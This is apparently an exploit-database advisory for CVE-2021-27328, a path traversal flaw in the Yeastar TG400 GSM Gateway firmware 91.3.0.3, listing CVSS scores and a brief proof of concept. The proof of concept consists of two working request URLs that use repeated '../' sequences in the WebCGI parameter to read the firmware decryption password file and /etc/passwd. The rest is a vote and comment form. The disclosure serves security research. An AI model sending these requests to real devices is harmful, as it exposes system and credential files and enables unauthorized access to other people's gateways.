Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

2021.02.27

Credit: SQSamir

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2021-27328

CWE: CWE-22

CVSS Base Score: 4/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3

This is a Proof of Concept for CVE-2021-27328
Example

    to get firmware decrypting password

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

    to get /etc/paswd

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.